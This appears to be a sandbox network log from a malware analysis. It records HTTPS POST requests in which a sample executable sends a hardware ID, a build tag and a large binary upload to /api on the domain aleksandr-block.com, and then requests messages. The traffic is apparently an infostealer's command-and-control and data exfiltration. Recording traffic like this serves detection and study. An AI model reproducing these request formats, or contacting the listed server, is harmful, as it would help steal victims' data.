                                                                                                                                                                                                                                                  2025-01-14 07:55:37 UTC5008OUTData Raw: d7 17 05 4b db 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e6 fa a3 60 69 db 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 db 5c 5f 14 2c 6d fb 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 9b eb 8f 82 a5 6d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 73 7d 51 b0 b4 ed a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 6d ae 2f f8 f5 58 32 78 29 1e bc 14 fc db e0 ab e6 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 9f be 7b 92 87 e3 95 6a 69
                                                                                                                                                                                                                                                  Data Ascii: K~`iO\_,mi`m?ls}Qm/X2x){ji
                                                                                                                                                                                                                                                  2025-01-14 07:55:37 UTC1139INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Tue, 14 Jan 2025 07:55:37 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Set-Cookie: PHPSESSID=m3j07v5lo3ttnuhc89d00jfsgj; expires=Sat, 10 May 2025 01:42:16 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                  vary: accept-encoding
                                                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MZzmyNMkS%2FTExDstaIK%2F%2BrQlik%2B5KF%2BF0kDHy91KqObzRF2%2FrzowwbEsj%2B7KTT8ReygNCK6Bc1qLTgeC94wis6B3%2FrScWz9SvjQCpWhjuBBgRu5H2iku4Wk9bgPVDr01ChrYLTIJ"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                  CF-RAY: 901c1095afd50f8f-EWR
                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1669&min_rtt=1666&rtt_var=631&sent=11&recv=24&lost=0&retrans=0&sent_bytes=2846&recv_bytes=21294&delivery_rate=1726788&cwnd=232&unsent_bytes=0&cid=31f866241665749b&ts=614&x=0"
                                                                                                                                                                                                                                                  2025-01-14 07:55:37 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                  2025-01-14 07:55:37 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  6192.168.2.749849188.114.96.34437532C:\Users\user\Desktop\yTRd6nkLWV.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2025-01-14 07:55:38 UTC280OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=IB5T9XD3ZG7CKB
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Content-Length: 1345
                                                                                                                                                                                                                                                  Host: aleksandr-block.com
                                                                                                                                                                                                                                                  2025-01-14 07:55:38 UTC1345OUTData Raw: 2d 2d 49 42 35 54 39 58 44 33 5a 47 37 43 4b 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 46 33 44 35 36 37 30 38 38 37 31 36 32 38 46 42 39 36 30 43 43 31 38 44 39 39 42 33 37 35 41 0d 0a 2d 2d 49 42 35 54 39 58 44 33 5a 47 37 43 4b 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 49 42 35 54 39 58 44 33 5a 47 37 43 4b 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 42 62 4c 37 4b 6b 2d 2d 30 34 53 0d 0a 2d 2d 49 42 35 54 39 58 44 33 5a 47
                                                                                                                                                                                                                                                  Data Ascii: --IB5T9XD3ZG7CKBContent-Disposition: form-data; name="hwid"5F3D56708871628FB960CC18D99B375A--IB5T9XD3ZG7CKBContent-Disposition: form-data; name="pid"1--IB5T9XD3ZG7CKBContent-Disposition: form-data; name="lid"BbL7Kk--04S--IB5T9XD3ZG
                                                                                                                                                                                                                                                  2025-01-14 07:55:39 UTC1132INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Tue, 14 Jan 2025 07:55:38 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Set-Cookie: PHPSESSID=imfjh1l496m08t7l15prv65hb9; expires=Sat, 10 May 2025 01:42:17 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                  vary: accept-encoding
                                                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nUK%2BZg2MOtvChj7qdV3hocnOS1qLfLiE5rV5uJYbo9b6JPdJPIB3W0%2F8nWPjOmFEDkUTye5C6xWO%2BeP7AttLWCrRBfyaHDUFqHri%2B4K%2FUFTS2d30xtSXzKUiAXFsZRlmGdwpl3m%2B"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                  CF-RAY: 901c109f69ce4225-EWR
                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1728&min_rtt=1717&rtt_var=667&sent=5&recv=9&lost=0&retrans=0&sent_bytes=2846&recv_bytes=2261&delivery_rate=1611479&cwnd=235&unsent_bytes=0&cid=7070876e2618fd17&ts=321&x=0"
                                                                                                                                                                                                                                                  2025-01-14 07:55:39 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                  2025-01-14 07:55:39 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  7192.168.2.749860188.114.96.34437532C:\Users\user\Desktop\yTRd6nkLWV.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2025-01-14 07:55:40 UTC278OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=ZKRWBOLO1Y
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Content-Length: 574883
                                                                                                                                                                                                                                                  Host: aleksandr-block.com
                                                                                                                                                                                                                                                  2025-01-14 07:55:40 UTC15331OUTData Raw: 2d 2d 5a 4b 52 57 42 4f 4c 4f 31 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 46 33 44 35 36 37 30 38 38 37 31 36 32 38 46 42 39 36 30 43 43 31 38 44 39 39 42 33 37 35 41 0d 0a 2d 2d 5a 4b 52 57 42 4f 4c 4f 31 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 5a 4b 52 57 42 4f 4c 4f 31 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 42 62 4c 37 4b 6b 2d 2d 30 34 53 0d 0a 2d 2d 5a 4b 52 57 42 4f 4c 4f 31 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69
                                                                                                                                                                                                                                                  Data Ascii: --ZKRWBOLO1YContent-Disposition: form-data; name="hwid"5F3D56708871628FB960CC18D99B375A--ZKRWBOLO1YContent-Disposition: form-data; name="pid"1--ZKRWBOLO1YContent-Disposition: form-data; name="lid"BbL7Kk--04S--ZKRWBOLO1YContent-Di
                                                                                                                                                                                                                                                  2025-01-14 07:55:40 UTC15331OUTData Raw: 40 35 fe 1f bf cf 02 6c 11 e9 98 42 da 09 f8 c3 58 1c 10 2c 80 36 24 c5 56 f6 e3 5d 31 40 92 dd c5 e5 f0 f0 7b 6d be 98 7d ad 81 59 fa a7 41 93 4f a9 73 45 b0 9a d8 7a d7 e4 c1 1e 68 59 3b b2 ed 44 d0 14 a8 77 a2 c6 05 1f 7c f8 d7 de df 73 86 14 5d ba 76 d9 aa 48 db a8 8d 63 6d 78 48 12 6f 26 dd 32 77 ea c0 b1 40 ed be d9 90 05 95 91 88 ad e1 20 25 0b 03 2c 3c 8d 2f 74 8f 5f 66 5d 2d 80 44 e5 7e bc 6d 4c 6f a0 95 72 45 39 25 df 97 fa 6b 7c b6 3a a6 d8 fe d7 50 68 60 2c 76 77 71 61 18 45 f0 87 5f 9e b1 fe dc e7 d2 13 11 aa 4a 9d 97 e0 de 8c 08 45 c3 03 2c c1 f5 88 44 b5 f1 8d 9b a3 b8 6e e2 6a 72 e8 fc 6e 0d 6a 44 44 04 7e a1 49 81 ca 7f 43 d6 6b 7e d3 03 0d 82 d0 ee ca 84 9c 46 38 d7 0d 20 16 f3 e6 4c c1 f2 a7 f9 45 10 7f 90 2e c8 40 fd ab c5 b0 24 a0 83
                                                                                                                                                                                                                                                  Data Ascii: @5lBX,6$V]1@{m}YAOsEzhY;Dw|s]vHcmxHo&2w@ %,</t_f]-D~mLorE9%k|:Ph`,vwqaE_JE,DnjrnjDD~ICk~F8 LE.@$
                                                                                                                                                                                                                                                  2025-01-14 07:55:40 UTC15331OUTData Raw: b6 53 bf 86 d6 7c 4c cc 2b 66 4f 47 53 82 ec 64 c3 45 71 83 81 61 ea 54 fb 63 fd ac 2c cd ed ce fd 12 9e d8 7e 2d 07 e3 ba de e5 61 d1 c9 39 34 ea 0c b8 07 7b 69 ff 94 4b 2f d7 8e c4 2f e4 bd db e2 de 74 8f db 6a e3 98 f7 a4 dc 41 0f 23 29 56 11 7f 8d 3b 4a 75 2d ef f4 48 88 fe 81 6c 46 dc 67 05 93 80 34 6e bf e7 e4 0b be be 84 5b 71 9f 39 f7 96 aa 94 59 44 97 b0 80 83 fb f1 01 1e f5 06 b5 c6 e0 58 19 ca 80 74 d8 8a c0 88 9d a3 18 eb eb a2 88 bf af 3f 8e d2 c2 78 56 a5 7a 0b 88 3d 34 fe 7b 9c 73 e9 62 6a 32 3b d2 4f fd 0d 7f 8d a1 10 df c5 d4 16 d1 66 a7 6d 22 97 10 c7 28 0a 2f 2c 31 6d 90 3d 2a 79 2c fc c8 d5 93 8b fe aa 44 85 c3 18 89 93 c5 c9 a2 52 7e dc 83 84 0e ec c9 31 7d 43 3b e1 6e 8f 98 19 cc 5d b1 36 0f b5 f9 fd 0b 63 9e f7 5a 0c fe 45 99 54 e0
                                                                                                                                                                                                                                                  Data Ascii: S|L+fOGSdEqaTc,~-a94{iK//tjA#)V;Ju-HlFg4n[q9YDXt?xVz=4{sbj2;Ofm"(/,1m=*y,DR~1}C;n]6cZET
                                                                                                                                                                                                                                                  2025-01-14 07:55:40 UTC15331OUTData Raw: f9 ad 87 f6 a0 df 01 5a 4a c8 c8 b6 17 ad c4 86 f9 8d de 81 e1 e7 ca 8d 1f 67 ee 09 16 83 fc 82 b7 ea c9 3a 64 57 f9 be a9 fc 43 9d 53 73 53 c9 d1 8a 26 da b5 5d 0e 41 a5 af 55 67 cf 1f 00 ba da ed 59 27 85 1a 7b 82 93 5a 24 49 cc 81 65 56 d3 f0 7d bc aa 4d 30 84 fd a8 f7 a6 0d 24 99 85 95 5e 28 91 bc a8 3a a5 93 cf 07 e6 fe 95 6c 19 b6 ad ac ef 09 11 64 07 ac 8e 36 18 a4 85 e9 11 89 1e 36 33 97 be e6 94 bb 5b e4 f0 9e b6 65 7c be c4 31 ec a3 67 9c 75 b4 9b 09 28 89 f6 33 51 58 92 4f f9 16 e2 29 b8 ea b7 fc 09 05 15 fa 3a d0 5e 02 25 5e 65 1f 3b d6 04 eb 88 46 3e 41 03 25 2c e0 0b 2c 47 31 87 cf 20 98 40 1d 7c 1e 9e 8e 94 e1 65 ca 9e 24 6a b7 81 fc 3b 8e 4e ee ab 60 6e 39 f2 6d 10 2d d8 29 79 d3 e6 f8 b1 0a d6 8d 73 19 58 c4 49 21 94 bc 3b 02 f1 55 5b cd
                                                                                                                                                                                                                                                  Data Ascii: ZJg:dWCSsS&]AUgY'{Z$IeV}M0$^(:ld663[e|1gu(3QXO):^%^e;F>A%,,G1 @|e$j;N`n9m-)ysXI!;U[
                                                                                                                                                                                                                                                  2025-01-14 07:55:40 UTC15331OUTData Raw: 78 68 3d 93 fc 65 c5 0b 8b f2 a0 c8 6a 48 42 ce e6 f6 b6 b7 2a 06 c2 02 aa c1 2d a5 58 4f f9 53 79 20 4c d7 84 78 9b d4 fc 4b 30 5c d9 23 2f 16 af c5 3b 59 20 25 5a 4c 6d 8c 8f ae ef fb 7b 2e b1 50 2f a7 33 30 e6 b2 b9 9e 6b aa d5 55 df 82 25 37 eb 0c 34 61 e3 fc b6 df 7b 80 9c bb 76 07 86 63 03 87 3d 49 f4 5b 92 13 2b e6 c3 eb 41 d1 ef aa ab 4e 9d 87 ea 8e 9f 27 6c de ec 78 74 7a 47 a4 57 72 96 e2 5c 9e fc f9 dc 6e 99 73 7a 6a 6a 59 0a 74 c6 8f f3 b6 85 eb 0d 4f 8f f8 f6 66 f1 a3 7c f9 c0 bb b7 ea 53 67 63 c4 a5 a6 c4 49 fc 10 63 db 07 3e dc 3e f5 af d9 de 10 c8 76 08 f9 6e 37 e9 70 0a 53 62 b5 f9 fb be 7c 58 95 ef 35 6c f1 a1 5d 71 0d e5 07 40 3a 9a 36 ae c5 f6 ca 51 0a 52 ae 15 cf 9a 61 c4 e1 f9 df 74 89 37 96 ec 63 2a e6 59 ef 43 47 45 cc e5 f1 0b 4a
                                                                                                                                                                                                                                                  Data Ascii: xh=ejHB*-XOSy LxK0\#/;Y %ZLm{.P/30kU%74a{vc=I[+AN'lxtzGWr\nszjjYtOf|SgcIc>>vn7pSb|X5l]q@:6QRat7c*YCGEJ
                                                                                                                                                                                                                                                  2025-01-14 07:55:40 UTC15331OUTData Raw: bd 23 2a 00 8a 27 51 6e 92 c0 c6 8c 5a 89 20 b7 bb e6 78 fe 62 11 88 07 f3 f2 c7 08 78 c8 03 30 c3 48 5c 59 0c 6c 41 96 a0 61 84 77 40 e1 ba f1 a8 77 a5 4b 9b 43 8a 06 31 f0 4b bc 61 33 1c 30 6e 60 47 f3 3f 70 03 97 fb ac 23 6f 6f 23 af 0b 0b 62 47 92 cb f6 ec 8e 08 d4 36 d3 ce aa d6 31 3e e2 77 18 0b c3 21 25 51 1e 8d ce c0 f0 5e 2e d9 87 db 79 90 28 d9 f2 24 d2 21 99 37 7a 9f 72 f5 84 08 62 60 08 84 72 82 1c fc dd 8d a1 f9 6c 8d 56 8c ed 98 ad 92 4f a8 36 ac a1 29 49 72 37 29 c5 c3 26 89 c1 99 76 f9 55 74 3d 8a 1e 12 22 2f a2 2e 8a 19 33 24 51 c1 41 99 01 c5 cc 89 ac db 2b b7 c9 95 8d 04 aa 10 11 21 38 ee 1b df 6c ec d1 88 ba cc 28 f7 9e 19 78 06 9f aa 4a 8e 59 f8 8d cd da 48 12 b6 c6 88 af 2d ae a6 e0 ee bd c6 84 df a4 f4 b9 d6 5b 39 95 4d b4 f2 21 19
                                                                                                                                                                                                                                                  Data Ascii: #*'QnZ xbx0H\YlAaw@wKC1Ka30n`G?p#oo#bG61>w!%Q^.y($!7zrb`rlVO6)Ir7)&vUt="/.3$QA+!8l(xJYH-[9M!
                                                                                                                                                                                                                                                  2025-01-14 07:55:40 UTC15331OUTData Raw: 5e a4 59 db 1d 70 9a 44 96 dc 9a 94 b4 bb 38 bf a2 19 62 4d 64 d6 7e b7 0c 3f db 33 e9 96 1f f4 d1 df 71 ad a3 c5 77 e9 2e a3 6e e9 54 8f c9 8a e7 2d ee a9 6a 6e 51 c3 cd ba b9 bb 8f c7 2f 5e 48 1c 77 3a 7e 94 8a c7 6b 4d 09 75 4b 47 a1 28 a1 3b 1a ef 73 6f 5f 69 94 11 ae 60 5d 6b 27 0a 08 39 74 33 9b 67 e5 87 bf f3 8d 5b 5a 51 8f dd 85 40 3c b1 fa 3f 7e a6 2f 77 1f 3b c6 23 19 df d1 58 67 db 0c 47 bd 2d 00 76 7b f8 e4 6e a2 2f 13 a6 d3 e1 e5 9a ca 89 30 5f a8 f7 bb cf 2c 73 a4 8e 46 f4 da f8 21 47 9a f3 1f cd 7a 4c a1 1b 8d e7 64 88 e4 0b 99 56 42 bf b0 bb e4 a6 6a 49 a0 09 25 5a fc 35 7d f2 54 e3 e7 d0 fd 72 d3 2a 28 d4 b4 ca 6a f3 53 ff 8d 97 36 1f a2 1c 66 7d 70 b8 e5 b9 5d 68 79 dc a6 d4 0e 57 7d 2c 03 ba 92 f1 51 41 02 fb fb c9 d8 54 b0 a7 8a d6 98
                                                                                                                                                                                                                                                  Data Ascii: ^YpD8bMd~?3qw.nT-jnQ/^Hw:~kMuKG(;so_i`]k'9t3g[ZQ@<?~/w;#XgG-v{n/0_,sF!GzLdVBjI%Z5}Tr*(jS6f}p]hyW},QAT
                                                                                                                                                                                                                                                  2025-01-14 07:55:40 UTC15331OUTData Raw: 4a 88 e4 be 4a af 99 30 48 f6 65 9b ea ed 45 5d dd c4 a4 53 54 6e 7a f1 26 84 62 4e 56 4b 54 8f e9 f1 56 72 fa a6 0d 89 24 11 ad b5 2e d0 e9 36 d9 80 8f ca 8e e6 89 3c 8f 39 c9 03 24 9a 89 e3 77 69 f7 0c 0a 8e 33 2d 5a 56 ca 15 03 a2 3c 18 fd 0d ca 67 bd 99 3c cb e0 3b 9f b0 7e e3 6d 7c e2 b6 19 8f 59 84 a1 e0 0a 42 2c 4b 47 a6 a8 63 30 c4 37 c5 ef c7 80 47 1c bc 2f c1 ed a4 29 81 75 20 83 bf ff fc 1e e5 03 c6 71 37 63 c3 d4 57 2d a9 a9 88 db 32 23 d6 c0 5d a5 51 cc e5 e3 6b 29 ad 31 e3 5d 7e 4e 81 ec ae 71 37 97 06 dc fa 21 8e c7 b8 d3 e7 65 1b 34 a4 63 f2 65 33 ea 5f 24 10 e1 1e bd 83 9e 68 d8 88 8f 20 a9 d1 fe 0d 5e dc eb 4f bb d9 67 9d a0 f7 57 d0 f5 61 ef 71 05 40 50 3a b3 47 7b 9e 1e 79 57 e8 8d c7 e5 45 af 60 40 4d 08 fc cd 7a 8f 84 37 22 6e 59 da
                                                                                                                                                                                                                                                  Data Ascii: JJ0HeE]STnz&bNVKTVr$.6<9$wi3-ZV<g<;~m|YB,KGc07G/)u q7cW-2#]Qk)1]~Nq7!e4ce3_$h ^OgWaq@P:G{yWE`@Mz7"nY
                                                                                                                                                                                                                                                  2025-01-14 07:55:40 UTC15331OUTData Raw: 46 d2 a0 f8 9e 12 92 be 82 47 e5 83 18 af a6 23 e4 43 39 33 51 b8 7a 4a 3c 35 de d8 57 5b f9 bc 67 ad 18 88 17 e3 64 35 46 88 82 03 52 0f 26 b4 f8 bb 2d 6b 7c 00 a5 8f b9 01 28 76 5d ab 27 de 82 69 bd f0 f9 6b e6 e7 f9 69 2c bd 32 81 58 20 dd d9 e2 e9 61 0d 29 97 2d f8 a1 cc 18 26 5f c2 ca 12 ae fd 76 fd 59 74 19 2a d1 80 12 fe 8d 0f 2d 36 da d9 06 ab 88 ea 85 b1 da a6 51 69 ef bd d7 07 d8 93 1b 69 e4 1c f7 bd 48 94 01 d1 dd f1 d5 d2 77 b7 73 a8 98 75 64 e3 8d 28 bd 91 a2 84 6d 95 29 b4 f6 7a 5a 75 fc 25 22 8d d6 d7 54 60 11 65 99 29 cc d3 65 21 c8 38 1f 83 7d ab c3 a2 12 8b 19 b3 4f 30 0e c7 99 47 09 0f 8a f5 72 65 fb 1c b5 9c b5 f9 5a 62 b4 57 86 c6 6f 96 e4 5f b8 36 06 69 44 99 b0 cc 2b 16 09 9c 20 c9 32 34 65 19 cc 51 d7 55 4c 3c e0 79 67 21 af 04 33
                                                                                                                                                                                                                                                  Data Ascii: FG#C93QzJ<5W[gd5FR&-k|(v]'iki,2X a)-&_vYt*-6QiiHwsud(m)zZu%"T`e)e!8}O0GreZbWo_6iD+ 24eQUL<yg!3
                                                                                                                                                                                                                                                  2025-01-14 07:55:40 UTC15331OUTData Raw: f5 be d6 d6 32 9e 5f 78 15 57 7b fb 19 9a 79 6c 52 3e af 81 46 aa 0b ea 19 48 a7 b4 96 f4 e0 a1 f9 34 9e bf 14 5d 8e eb 3d 42 d8 b7 0d f3 c2 7e d0 fd 16 a6 f8 10 61 b5 34 1b 40 b5 80 9a de 2e 78 a8 92 3a 07 2e 26 fd 7d c9 de a1 37 5a e5 1d df 02 a6 b5 61 0a ae 45 a7 30 52 60 89 f3 78 e0 b9 a5 ec 8c 82 54 a7 3b 11 ba 78 08 8f 56 0e 03 9c 10 a1 d0 b2 d1 25 21 45 d3 c5 78 bc 72 ca 8c d4 18 3f de 0a af 01 8f 0c 1c 6c cd 29 28 41 d3 4f c0 45 8b 01 eb 06 ea 94 9c 03 71 76 e0 c5 c3 e9 2b 1d 44 9b b7 51 af 35 9c e5 10 8d be b8 f8 ad 2d b4 b8 1d 80 e9 a9 b5 de 72 5e b1 ed 6d f4 a5 e6 3c 94 d8 cb 53 5c c3 b5 55 a0 37 7e f0 d8 3c 86 ed 19 aa d7 87 90 da 20 80 66 61 e8 e2 43 12 09 1b f9 18 2e 5a 1e d7 bf ab f6 5c 99 28 22 79 d0 cd 55 8a 45 79 a3 cb 9f 56 a3 89 5b 9f
                                                                                                                                                                                                                                                  Data Ascii: 2_xW{ylR>FH4]=B~a4@.x:.&}7ZaE0R`xT;xV%!Exr?l)(AOEqv+DQ5-r^m<S\U7~< faC.Z\("yUEyV[
                                                                                                                                                                                                                                                  2025-01-14 07:55:42 UTC1131INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Tue, 14 Jan 2025 07:55:42 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Set-Cookie: PHPSESSID=q5m3gd5aus4ndatohbvptmm5jo; expires=Sat, 10 May 2025 01:42:20 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                  vary: accept-encoding
                                                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mihTghtlY6Aj57wrpC5b9D6V1quBKZNBZPZIMe2vz50%2FNXzgALbV3dfsqst96v8PV9hDjCGp5Bwm1pP%2BVjdeJDBzKrRXLxD91XHSZaRZXvOEgoV6P72Z3Jn61DZcee9YmpRVBDry"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                  CF-RAY: 901c10a988a10f68-EWR
                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1612&min_rtt=1608&rtt_var=612&sent=197&recv=592&lost=0&retrans=0&sent_bytes=2846&recv_bytes=577425&delivery_rate=1772920&cwnd=238&unsent_bytes=0&cid=8cf827aad383fa0c&ts=1805&x=0"


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  8192.168.2.749876188.114.96.34437532C:\Users\user\Desktop\yTRd6nkLWV.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2025-01-14 07:55:42 UTC267OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Content-Length: 80
                                                                                                                                                                                                                                                  Host: aleksandr-block.com
                                                                                                                                                                                                                                                  2025-01-14 07:55:42 UTC80OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 42 62 4c 37 4b 6b 2d 2d 30 34 53 26 6a 3d 26 68 77 69 64 3d 35 46 33 44 35 36 37 30 38 38 37 31 36 32 38 46 42 39 36 30 43 43 31 38 44 39 39 42 33 37 35 41
                                                                                                                                                                                                                                                  Data Ascii: act=get_message&ver=4.0&lid=BbL7Kk--04S&j=&hwid=5F3D56708871628FB960CC18D99B375A
                                                                                                                                                                                                                                                  2025-01-14 07:55:43 UTC1127INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Tue, 14 Jan 2025 07:55:43 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Set-Cookie: PHPSESSID=h6p5g7uu8bca1ktjq35671uslj; expires=Sat, 10 May 2025 01:42:22 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                  vary: accept-encoding
